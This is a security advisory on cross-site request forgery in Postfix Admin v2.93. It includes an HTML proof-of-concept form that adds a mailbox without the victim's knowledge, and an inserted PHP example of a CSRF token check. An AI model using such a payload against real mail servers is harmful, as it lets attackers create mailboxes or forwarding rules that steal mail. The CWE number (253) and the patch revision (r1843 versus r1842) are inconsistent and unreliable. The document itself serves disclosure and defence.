Postfix Admin v2.93 Generic POST Cross-Site Request Forgeries
May 21, 2016 · By Julien Ahrens
ADVISORY INFORMATION
- Product: Postfix Admin
- Vendor URL: sourceforge.net/projects/postfixadmin/
- CWE: Cross-Site Request Forgery [CWE-253]
- Date found: 2016-04-23
- Date published: 2016-05-21
- CVSS Score: 4.6 (AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N)
- CVE: -
CREDITS
This vulnerability was discovered and researched by Julien Ahrens from RCE Security.
VERSIONS AFFECTED
Postfix Admin v2.93 (latest); older versions may be affected too.
INTRODUCTION
Postfix Admin is a Web Based Management tool created for Postfix. It is a PHP based application that handles Postfix Style Virtual Domains and Users that are stored in MySQL or PostgreSQL.
(from the vendor’s homepage)
VULNERABILITY DETAILS
The application “Postfix Admin” exposes its configuration functions via both HTTP GET and HTTP POST requests. While GET-based operations such as deleting a mailbox are protected by a CSRF token called “token”, the POST-based functions, such as adding email forwarding settings, adding new mailboxes or adding aliases, carry no such token at all, which leaves them vulnerable to CSRF attacks.
The following Proof-of-Concept triggers this vulnerability and adds a new mailbox:
<html>
  <body>
    <form action="https://localhost/edit.php?table=mailbox&domain=localhost.com" method="POST">
      <input type="hidden" name="table" value="mailbox" />
      <input type="hidden" name="value[local_part]" value="test1234" />
      <input type="hidden" name="value[domain]" value="localhost.com" />
      <input type="hidden" name="value[password]" value="rcesec" />
      <input type="hidden" name="value[password2]" value="rcesec" />
      <input type="hidden" name="value[name]" value="rcesec" />
      <input type="hidden" name="value[quota]" value="10000" />
      <input type="hidden" name="value[active]" value="1" />
      <input type="hidden" name="submit" value="Add Mailbox" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
RISK
To successfully exploit this vulnerability, a user must be tricked into visiting an attacker-controlled website while holding an authenticated session in Postfix Admin. Both types of user accounts (mailbox users and administrators) are affected, but for a mailbox user the only exploitable functionality is adding email forwarding settings.
The vulnerability allows remote attackers to perform sensitive actions, such as adding new mailboxes or adding email forwarding rules, in the authentication context of the targeted user.
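The missing protection described above is a per-session token that the POST handler verifies before changing state. The following is an added illustration by the editor of such a check, not Postfix Admin's code and not the vendor's fix; the function names are assumed, the field name "token" mirrors the one the advisory says the GET operations already use, and the session is assumed to be started by the application's login handling.

```php
<?php
// Added example, not Postfix Admin's code nor the vendor's patch.
// Assumes the application has already started the PHP session at login.
declare(strict_types=1);

// Return the per-session CSRF token, creating it on first use.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field that every state-changing POST form must carry.
function csrf_field(): string
{
    return '<input type="hidden" name="token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '" />';
}

// True only when a token was submitted and it matches the session copy.
// hash_equals() compares in constant time.
function csrf_check(array $post): bool
{
    if (!isset($post['token'], $_SESSION['csrf_token']) || !is_string($post['token'])) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], $post['token']);
}

// In a handler such as edit.php the check runs before any database write:
//   if ($_SERVER['REQUEST_METHOD'] === 'POST' && !csrf_check($_POST)) {
//       http_response_code(403);
//       exit('invalid CSRF token');
//   }

// Stand-alone demonstration (php csrf.php): a cross-site page cannot read the
// victim's session token, so a body shaped like the advisory's PoC is rejected,
// while the same body submitted from a form that includes csrf_field() passes.
$_SESSION = [];   // stand-in for session_start() when run on the CLI
$forged = ['table' => 'mailbox', 'value' => ['local_part' => 'test1234'], 'submit' => 'Add Mailbox'];
$legit  = $forged + ['token' => csrf_token()];   // constructed sample requests
echo 'forged request: ', csrf_check($forged) ? 'accepted' : 'rejected', PHP_EOL;
echo 'legit request:  ', csrf_check($legit) ? 'accepted' : 'rejected', PHP_EOL;
```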
SOLUTION
Check out the latest trunk including [r1843].
REPORT TIMELINE
- 2016-04-23: Discovery of the vulnerability
- 2016-04-23: Created https://sourceforge.net/p/postfixadmin/bugs/372/
- 2016-05-20: Vendor committed patch to SVN trunk r1842
- 2016-05-21: Advisory released